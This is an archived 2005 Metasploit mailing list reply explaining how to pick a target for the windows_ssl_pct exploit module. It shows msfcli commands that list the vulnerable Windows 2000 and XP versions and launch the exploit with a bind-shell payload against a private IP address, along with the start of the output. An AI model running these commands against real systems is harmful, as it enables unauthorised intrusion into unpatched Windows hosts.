Metasploit mailing list archives
windows_ssl_pct :: no default target error
From: mmiller at hick.org (mmiller at hick.org)
Date: Wed, 12 Jan 2005 11:29:03 -0600
On Wed, Jan 12, 2005 at 12:13:02PM -0500, Greg Poirier wrote:
exploits/windows_ssl_pct.pm shows that GetEnv{'TARGET'} is used to define the $target_idx variable. A simple explanation of the TARGET variable in the $info->{'UserOpts'} hash would be very helpful.
$ ./msfcli windows_ssl_pct T Supported Exploit Targets ========================= 0 Windows 2000 SP4 1 Windows 2000 SP3 2 Windows 2000 SP2 3 Windows 2000 SP1 4 Windows 2000 SP0 5 Windows XP SP0 6 Windows XP SP1 7 Debugging Target $ ./msfcli windows_ssl_pct RHOST=192.168.151.2 PAYLOAD=win32_bind Target=5 E [*] Starting Bind Handler. [*] Attempting to exploit target Windows XP SP0
Current thread:
- windows_ssl_pct :: no default target error Greg Poirier (Jan 12)
- windows_ssl_pct :: no default target error mmiller at hick.org (Jan 12)